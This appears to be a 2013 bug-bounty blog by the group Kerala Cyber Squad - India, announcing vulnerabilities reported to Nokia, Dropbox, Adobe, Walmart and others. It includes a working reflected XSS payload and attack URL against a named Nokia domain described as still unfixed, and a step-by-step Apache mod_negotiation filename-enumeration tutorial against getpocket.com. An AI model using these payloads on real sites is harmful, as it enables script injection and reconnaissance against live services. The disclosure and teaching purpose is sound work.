KeralaCyberSquad-India

Tuesday, December 24, 2013

Reflected XSS on DotEasy WebHosting....

1) Go to DotEasy.com

2) Navigate to Web Mail Login at the top, insert your payload, and hit Enter.

3) You should get a prompt like I got...

Greetz to ...KeralaCyberSquad-India...
www.Facebook.com/KeralaCyberSquad
sherin.real1@gmail.com

Monday, December 23, 2013

Nokia Solutions and Networks reflected XSS





 Hello Geeks ,

Here is the POC of a Reflected XSS that I have found on Nokia Solutions and Networks' domain https://rctool.access.nsn.com


[+] Vulnerable URL = https://rctool.access.nsn.com
[+] Vulnerable parameter =  err
[+] Payload used =  <SCRIPT>+prompt("xssed by Praveen Nair");</SCRIPT>
[+] URL with malicious Payload= https://rctool.access.nsn.com/login.asp?login=false&err=<SCRIPT>+prompt("xssed by Praveen Nair");</SCRIPT>
[+] Reported
[+] Duplicated
[+] Still Unfixed



Praveen Nair
Kerala Cyber Squad - India

Sunday, December 22, 2013

Apache mod_negotiation filename bruteforcing ( file-name buster ) vulnerability with LIVE Example


Hey Ya Geeks ,,

  
  I am Praveen Nair from Team Kerala Cyber Squad - India.
  Today I am going to share a lesser-known file-name bruteforcing ( File-name Buster ) attack on Apache servers. Even though its risk level is low, I found it interesting, so I thought of sharing it with you all. Let's go into it without wasting much time :)

  [+] THINGS YOU GONNA NEED 
  
 #>> A TOOL TO INTERCEPT THE HEADER REQUEST AND RESPONSE ( LIKE BURP , LIVE HTTP HEADER .....ETC ETC )
 #>> IMPORTANT THINGS >> GOOD EYES TO WATCH OUT FOR THE HOLES. :D
                       >> BRAIN TOO :p
  
  [+] TARGET =  Pocket's main-domain (i.e) http://getpocket.com/
  [+] VULNERABILITY = Apache mod_negotiation filename bruteforcing vulnerability 
  
  #>> RISK :- INFORMATION DISCLOSURE ( LOW )
  
  #>> WHAT ACTUALLY IS THIS ATTACK ??? \0_0/
  
     mod_negotiation is the Apache module responsible for selecting, from several available documents, the one that best matches the client's capabilities. If the client provides an invalid Accept header, the server responds with a 406 Not Acceptable error containing a pseudo directory listing. This behavior can help an attacker learn more about the target: for example, to generate a list of base names, generate a list of interesting extensions, look for backup files and so on.

MultiViews is an Apache option which acts with the following rules:

    If the server receives a request for /some/dir/foo, if /some/dir has MultiViews enabled, and /some/dir/foo does not exist, then the server reads the directory looking for files named foo.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings it would have if the client had asked for one of them by name. It then chooses the best match to the client's requirements.
  #>> HOW TO ATTACK / VERIFICATION AND RE-GENERATION ?? :N
  
  It depends on several Accept* headers in the client Request.

    Accept
    Accept-Language
    Accept-Encoding

   So, let's see how it actually works:
   
   Turn on the interceptor tool and stay connected.
   
   Suppose an attacker requests "index" without any extension:
   
   All he has to do is enter http://site.com/index in the address bar and press Enter (here the target is http://getpocket.com/ ). Let's see what we get in the request headers.
   
   #>> HTTP Header Request :-
   
   GET http://getpocket.com/index  HTTP/1.1
   Host: getpocket.com
   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   Accept-Language: en-US,en;q=0.5
   Accept-Encoding: gzip, deflate
   Connection: keep-alive

 
   Focus here on the "Accept" header, whose value is "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8". It ends with */*, so this request carries an "Accept:" header with an existing MIME type ( */* ).
   
   
   #>> HTTP Header Response :-
   
   HTTP/1.1 200 OK
   Content-Location: index.php
   Content-Type: text/html; charset=UTF-8
   Date: Fri, 04 Oct 2013 18:10:48 GMT
   P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa OUR IND UNI COM NAV INT STA PRE"
   Server: Apache
   Set-Cookie: sess_guid=by5A1g73dR504Tb2fup4e11phRT8d332f40B54F617tjt7a56416dma8rd7WU171; expires=Sat, 30-Sep-2028 18:10:48 GMT; path=/; domain=getpocket.com
   Set-Cookie: sess_start_time=1380910248; path=/; domain=.getpocket.com
   TCN: choice
   Vary: negotiate
   x-frame-options: SAMEORIGIN
   Transfer-Encoding: chunked
   Connection: keep-alive
   
   Now, notice that the server response contains several interesting headers:

   Content-Location: index.php
   Vary: negotiate
   TCN: choice


   This means MultiViews is enabled on the / directory, as the server automatically selects the file index.php.

   Let's see what happens if the request uses an "Accept:" header with a nonexistent MIME type ( test/hell ):
   
  
   
    #>> HTTP Header Request :-
   
   GET http://getpocket.com/index  HTTP/1.1
   Host: getpocket.com
   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9;q=0.8
   Accept: test/hell
   Accept-Language: en-US,en;q=0.5
   Accept-Encoding: gzip, deflate
   Connection: keep-alive
   
   #>> HTTP Header Response :-
   
   HTTP/1.1 406 Not Acceptable
   Alternates: {"index.php" 1 {type text/html}}
   Content-Type: text/html; charset=iso-8859-1
   Date: Fri, 04 Oct 2013 18:23:33 GMT
   Server: Apache
   TCN: list
   Vary: negotiate
   Content-Length: 410
   Connection: keep-alive


   #>> OUTPUT :-

 
      <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
   <html><head>
   <title>406 Not Acceptable</title>
   </head><body>
   <h1>Not Acceptable</h1>
   <p>An appropriate representation of the requested resource /index could not be found on this server.</p>
   Available variants:
   <ul>
   <li><a href="index.php">index.php</a> , type text/html</li>
   </ul>
   <hr>
   <address>Apache Server at getpocket.com Port 80</address>
   </body></html>


   Woo! With a single request we get a listing of all the files!  ;)

   Well, yeah. Not really *all* the files, but every file with the requested base name and an extension listed in the mime-types file.

   This means that if index.whatever* is on the server, it will be listed.

   Similarly, the attacker can use any file name in place of "index", which results in filename bruteforcing through Apache's mod_negotiation module.
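
   To check your own server's responses for this exposure, the headers shown above can be parsed offline. This Python sketch is an added example, not part of the original post; the function names are made up for illustration, and the sample responses are the two captures above with the cookie and date headers trimmed.

```python
import re

# Headers taken from the two responses shown in the post (cookies etc. trimmed).
RESP_200 = """HTTP/1.1 200 OK
Content-Location: index.php
Content-Type: text/html; charset=UTF-8
Server: Apache
TCN: choice
Vary: negotiate
"""
RESP_406 = """HTTP/1.1 406 Not Acceptable
Alternates: {"index.php" 1 {type text/html}}
Content-Type: text/html; charset=iso-8859-1
Server: Apache
TCN: list
Vary: negotiate
"""

# One Alternates entry: {"name" quality {attr value} ...}
VARIANT_RE = re.compile(r'\{"([^"]+)"\s+([0-9.]+)((?:\s*\{[^{}]*\})*)\s*\}')


def parse_headers(raw):
    """Split a raw response into (status_code, {lowercased-name: value})."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def parse_alternates(value):
    """Return [(filename, quality, {attr: value})] from an Alternates header."""
    variants = []
    for name, quality, attrs in VARIANT_RE.findall(value):
        pairs = (a.split(None, 1) for a in re.findall(r"\{([^{}]*)\}", attrs))
        attr_map = {p[0]: p[1] for p in pairs if len(p) == 2}
        variants.append((name, float(quality), attr_map))
    return variants


def audit(raw):
    """Summarise what a response reveals about content negotiation."""
    status, h = parse_headers(raw)
    negotiated = "negotiate" in h.get("vary", "").lower() or "tcn" in h
    leaked = [v[0] for v in parse_alternates(h.get("alternates", ""))]
    if negotiated and "content-location" in h:
        leaked.append(h["content-location"])  # real file behind the bare name
    return {"status": status, "negotiation": negotiated, "leaked_names": leaked}
```

   If audit() reports negotiation on a directory that does not need it, setting "Options -MultiViews" for that directory turns off the implicit foo.* search, so the Alternates header and the 406 variant list are no longer produced.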
   
   Hope this tut was a lil bit informational to you all. :)
   
   [+] This vulnerability was reported to the GetPocket Security Team, and as a result they rewarded me by adding my name to their Hall of Fame.
      
   Thanks for having a look at this post . :)
   
   Please leave your comments below.
   
   Praveen Nair ( c0d3 c0m4dr3 404 )
   
Team - Kerala Cyber Squad - India
   ./xit n 0ut

     

Friday, December 20, 2013

Got Listed on BitWall Security Researchers List





We are proud to make you aware of one more achievement by our Team: Kerala Cyber Squad - India's member ( Praveen Nair ) has been listed on the BitWall Security Researchers List.

http://www.bitwall.io/security

Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)

Got listed in Nokia Solutions and Networks's Responsible Disclosure list




We are proud to make you aware of one more achievement by our Team: Kerala Cyber Squad - India has been listed in Nokia Solutions and Networks' Responsible Disclosure list.

http://nsn.com/responsible-disclosure

Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)


Got listed in Androidfreeapp.net's Security Researcher list






We are proud to make you aware of one more achievement by our Team: Kerala Cyber Squad - India has been listed in Androidfreeapp.net's Security Researchers list.
http://www.androidfreeapp.net/security-researcher-acknowledgments/

Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. :)

Got Listed on Telekom Security Acknowledgement List ( Second Time )




We are proud to make you aware of one more achievement by our Team: Kerala Cyber Squad - India's member ( Praveen Nair, with his mate Simone Memoli ) has been listed on the Telekom Security Acknowledgement List.

This is the second achievement by Kerala Cyber Squad - India on Telekom.

http://www.telekom.com/security/acknowledgements

Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)

Got Listed in MailChimp Security Incident Response Team List



We are proud to make you aware of one more achievement by our Team: Kerala Cyber Squad - India's member ( Praveen Nair ) has been listed in the MailChimp Security Incident Response Team List.

http://mailchimp.com/about/security-response/

Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)

Thursday, December 19, 2013

Rackspace #Content_Spoofing Vulnerability..!!! (KeralaCyberSquad-India)

                                              POC Reported by Swapnil Thaware....
Special thanks to Swapnil Thaware....
 
Sherin Panikar (KeralaCyberSquad-India)
 
 

Wednesday, December 18, 2013

Vulnerabilities @ Dropbox.

 
Vulnerability @ DropBox

Insecure upload that can lead to XSS and other vulnerabilities @ Dropbox.

Description:-
Status : Unfixed!
Reported : Dec 8,2013
Follow Up Reply : Dec 9,2013
Greetz to Evan Ricafort (Robinhood:0x00)

KeralaCyberSquad-India (Sherin Panikar aka HardNocks-HittnHard).

Saturday, December 14, 2013

LavaSoft Stored XSS

Hi Guys ,

Here is the POC for Stored XSS found on Lavasoft .







Reported On - 7th Dec. 2013
Got no reply and it's fixed now .. :/



XSS on CV Maker's site

Hi Guys,

Today I am going to present a Stored XSS on CV Maker's official website ( http://cvmkr.com/ )

Step 1 :
  Go to https://cvmkr.com/CV/new

Step 2 :


Step 3 :



Step 4 : 

Step 5 :


[+] Reported 
[+] Acknowledged With a Certificate :)



 Credits to : Praveen Nair 
 Greets: To all Members and Supporters of Kerala Cyber Squad -India  and all Bug  Hunters 

Got listed in Pinoy Hack News' Responsible Disclosure List ( TWICE )


We are Proud to make you aware of Another Achievement by Team Kerala Cyber Squad - India
Kerala Cyber Squad - India got listed in Pinoy Hack News' Responsible Disclosure List ( Twice )
http://www.pinoyhacknews.com/security





 Credits to : Praveen Nair , Sherin Panikar
 Greets: To all Members and Supporters of Kerala Cyber Squad -India  and all Bug  Hunters    

Tuesday, December 10, 2013

Got listed in Magix Security Acknowledgments List ( Twice )


We are Proud to make you aware of Another Achievement by Team Kerala Cyber Squad - India

Kerala Cyber Squad - India got listed in Magix's Security Acknowledgments List ( Twice )

http://research.magix.com/



 Credits to : Praveen Nair , Sherin Panikar
 Greets: To all Members and Supporters of Kerala Cyber Squad -India  and all Bug  Hunters    

Tuesday, November 26, 2013

Got listed in GetPocket Security Acknowledgments List ( Twice )


We are Proud to make you aware of Another Achievement by Team Kerala Cyber Squad - India

Kerala Cyber Squad - India got listed in GetPocket's Security Acknowledgments List ( Twice )

http://help.getpocket.com/customer/portal/articles/1225832-pocket-security-overview




 Credits to : Praveen Nair , Sherin Panikar
 Greets: To all Members and Supporters of Kerala Cyber Squad -India  and all Bug     

Friday, November 22, 2013

Cross Site Scripting Attack ( XSS ) on Adobe's Main Domain


  A Cross Site Scripting Attack ( XSS ) was reported on Adobe's Main Domain 

      [+] Proof Of Concept :-


   

        [+] Reported

        [+] Acknowledged in their Hall of Fame after 5 months :P

                 

         Credits to : Praveen Nair , Surya Subhash
         Greets: To all Members and Supporters of Kerala Cyber Squad -India  and all Bug                        Hunters a

Thursday, November 21, 2013

Got listed in Adobe Security Acknowledgments list ( Twice )


Kerala Cyber Squad - India has been listed in the Adobe Security Acknowledgments list two times for reporting a Cross Site Scripting attack and some other vulnerability.

http://www.adobe.com/support/security/bulletins/securityacknowledgments.html

Credits to :- Sherin Panikar , Praveen Nair , Surya Subhash

Greets to all members of Kerala Cyber Squad - India and all Bug Hunters :) (y)

Wednesday, November 20, 2013

Got listed in Telekom Security Acknowledgements List


Kerala Cyber Squad - India's Bug Hunter got listed in the Telekom Security Acknowledgements List for helping them solve some web application flaws on their domain.
http://www.telekom.com/security/acknowledgements

Credits to :- Sherin Panikar ( Co- Founder and a Young upcoming Security Researcher ) 

Greets to all members of Kerala Cyber Squad - India and all Bug Hunters :) 



Monday, June 3, 2013

National Geographic Website Vulnerable to XSS Attack found by KeralaCyberSquad-India...



National Geographic , also commercially abbreviated and trademarked as Nat Geo, is an American subscription channel, that airs non-fiction television programs produced by the National Geographic Society and other production companies. Like History and the Discovery Channel, the channel features documentaries with factual content involving nature, science, culture, and history, plus some reality programming. The channel is owned primarily by Fox Cable Networks, a division of News Corporation.

Their website was found vulnerable to an XSS (Cross Site Scripting) attack.
The vulnerability was found and reported by a cyber security researcher group called "KeralaCyberSquad-India".

"KeralaCyberSquad-India" is operated from different states of India...

Thursday, May 23, 2013

IndiaToday Vulnerable to XSS Attack-found by M4s73rX0r (from KeralaCyberSquad-India).




IndiaToday is an Indian English-language weekly magazine, established in 1975.
At present, India Today is published in Hindi, Telugu, Tamil and Malayalam. India Today International, an edition of the weekly news magazine, is circulated across the world.
The official website of IndiaToday was found vulnerable to an XSS (Cross Site Scripting) attack.
The vulnerability was found and reported by a cyber security researcher group called "KeralaCyberSquad-India".

"KeralaCyberSquad-India" is operated from different states of India...

OLX.IN Vulnerable To Cookie Disclosure Found By KCS - India


OLX offers free local classified ads in India. OLX is the next generation of free online classifieds. OLX provides a simple solution to the complications involved in selling, buying, trading, discussing, organizing, and meeting people near you.

Site Link: http://olx.in
Vulnerability: Cookie Disclosure
Vulnerability Found By: Kerala Cyber Squad - India
Status: Vuln. Reported To Admin
KCS - India Group On Fb : https://facebook.com/KeralaCyberSquad

Monster.com Vulnerable to XSS Attack found by Kerala Cyber Squad-India


Monster.com is one of the largest employment websites in the world, owned and operated by Monster Worldwide, Inc. Monster was one of the 20 most visited websites out of 100 million worldwide, according to comScore Media Metrics. It was created in 1999 by the merger of The Monster Board (TMB) and Online Career Center (OCC), which were two of the first and most popular career web sites on the Internet. Monster is primarily used to help those seeking work to find job openings that match their skills and location.
Today, Monster is the largest job search engine in the world. Monster has over a million job postings at any time and over 1 million resumes, in the database (2008) and over 63 million job seekers per month. The company employs approximately 5,000 employees in 36 countries. 

The Most Visited JobPortal Site Monster...
And it was found vulnerable to a Cross-Site Scripting (XSS) attack.
The vulnerability was found by a cyber security researcher group called "KeralaCyberSquad-India".
KeralaCyberSquad-India is Operated from different states of India...

Click to visit Facebook page of KeralaCyberSquad-India

Tata Group's Website Vulnerable to XSS Attack Found by Kerala Cyber Squad-India

Tata Group Indian Multinational Conglomerate Companies Website is Vulnerable to XSS Attack.
Vulnerability was found by Group of Computer Security Researchers
 Known as "KeralaCyberSquad-India"
DOM BASED XSS IS FOUND ON TATA GROUP WEBSITE.
Kerala Cyber Squad - India , Group of Individuals Operating From Different Part of India...

Kerala Cyber Squad-India Facebook Page

Walmart Website Vulnerable to XSS Found By Kerala Cyber Squad-India

Wal-Mart Stores, Inc., branded as Walmart, is an American multinational retail corporation that runs chains of large discount department stores and warehouse stores. The company is the world's third largest public corporation, according to the Fortune Global 500 list in 2012, the biggest private employer in the world with over two million employees, and is the largest retailer in the world. Walmart remains a family-owned business, as the company is controlled by the Walton family, who own a 48 percent stake in Walmart. It is also one of the world's most valuable companies.

WalMart 's website is vulnerable to XSS - Cross Site Scripting Attack.

The vulnerability was found by computer security researchers group "KeralaCyberSquad-India".
KeralaCyberSquad-India  is operated from different states of India...
The Vuln is reported successfully ...
KeralaCyberSquad-India Facebook Page